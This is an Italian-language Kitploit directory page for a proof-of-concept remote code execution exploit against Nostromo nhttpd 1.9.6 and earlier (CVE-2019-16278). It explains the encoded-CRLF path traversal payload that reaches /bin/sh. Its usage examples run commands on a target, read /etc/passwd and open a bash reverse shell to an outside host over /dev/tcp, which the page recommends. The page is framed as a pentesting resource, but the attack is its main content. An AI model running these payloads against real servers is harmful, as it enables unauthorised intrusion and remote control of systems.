Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-16278 — PoC RCE exploit per Nostromo nhttpd ≤ 1.9.6 | Kitploit
Strumenti/GitHubGitHub/andknownmaly/cve-2019-16278
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubandknownmaly/cve-2019-16278

CVE-2019-16278

PoC RCE exploit per Nostromo nhttpd ≤ 1.9.6

Vedi Repository
38 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-16278 - Nostromo nhttpd RCE

Descrizione della vulnerabilità

Vulnerabilità di esecuzione di codice in remoto in Nostromo nhttpd versioni <= 1.9.6 tramite directory traversal nella gestione delle richieste HTTP.

Versioni interessate

  • Nostromo nhttpd 1.9.6 e precedenti

Dettagli dell'exploit

Questo exploit sfrutta una vulnerabilità di directory traversal utilizzando caratteri CRLF codificati in URL (%0d) per accedere a /bin/sh ed eseguire comandi arbitrari.

Come funziona:

  1. Invia una richiesta POST con path traversal: /.%0d./.%0d./.%0d./.%0d./bin/sh
  2. Utilizza l'header Content-Length per controllare la dimensione del payload
  3. Esegue i comandi tramite redirezione della shell: echo\necho\n<command> 2>&1

Utilizzo

root@kitploit:~
python3 cve-2019-16278.py <TARGET_IP> <PORT> <COMMAND>

Esempio:

root@kitploit:~
python3 cve-2019-16278.py 192.168.1.100 80 "id"
python3 cve-2019-16278.py 10.10.10.10 8080 "cat /etc/passwd"
python3 cve-2019-16278.py target.com 80 "whoami"
python3 cve-2019-16278.py 10.10.10.10 80 "bash -c 'bash -i >& /dev/tcp/10.10.20.20/4444 0>&1'"

Reverse shell consigliata, a volte questo script non mostra nulla

Requisiti

  • Python 3
  • Accesso di rete al server di destinazione
  • Target che esegue una versione vulnerabile di Nostromo nhttpd

Riferimenti

  • CVE: CVE-2019-16278
  • https://www.exploit-db.com/exploits/47837
  • https://nvd.nist.gov/vuln/detail/CVE-2019-16278

Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati. L'accesso non autorizzato ai sistemi informatici è illegale.

Scarica lo strumento